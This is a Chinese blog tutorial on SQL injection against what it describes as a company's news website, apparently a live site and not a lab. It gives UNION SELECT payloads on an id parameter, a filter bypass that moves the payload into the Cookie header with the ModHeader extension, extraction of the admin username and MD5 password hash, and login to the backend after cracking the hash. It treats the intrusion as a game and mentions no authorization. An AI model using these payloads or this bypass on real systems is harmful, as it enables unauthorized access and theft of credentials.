Sql Injection — 注入攻击原理-2(实战)

本文通过实战案例展示SQL注入攻击过程。在尝试注入时遇到防护,利用ModHeader工具修改请求头成功绕过,最终获取后台MD5加密的用户名和密码,实现登录。
摘要由CSDN通过智能技术生成

还是实战,如果没什么事的话几乎每天日更


前言

sql实战-2


提示:以下是本篇文章正文内容,下面案例可供参考

一、

在这里插入图片描述
公司的新闻网
在这里插入图片描述
我们进入一篇文章,我们发现这个网页应该是ASP动态网页文件
还记得第一篇文章的sql注入吗?如果不知道的话,可以看看这里

?id=171 order by 10

在这里插入图片描述
哎呀,不出啊
那就试试11,12,13
在这里插入图片描述
哦,出错了,这说明什么,这说明此页面存在sql注入

?id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin

插入吧
在这里插入图片描述
该死,有防,那怎么办,写不了了不更了,人走高飞
在这里插入图片描述
有防的?没关系,就用ModHeader,
Edge点这个下载
fire fox点击这个下载
新建Request头
刚安装的应该就有,不用新建
在这里插入图片描述
好了吗,如果准备好了,我们就继续,Let’s go

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

把这串代码扔到value,name取cookie,就像这样
在这里插入图片描述
在这里插入图片描述
出现了这个🤔

换,换上这个。

id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

在这里插入图片描述
哎,这不就出来了吗

这是个什么玩意?b9a2a2b5dffb918c

这是MD5
在这里插入图片描述
好了GAME OVER
然后就帅气的进入后台
在这里插入图片描述
用户名一般都是admin
密码就是md5解密的密码
在这里插入图片描述

总结

总结就是:我头像真好看自恋重度患者

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

「已注销」

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值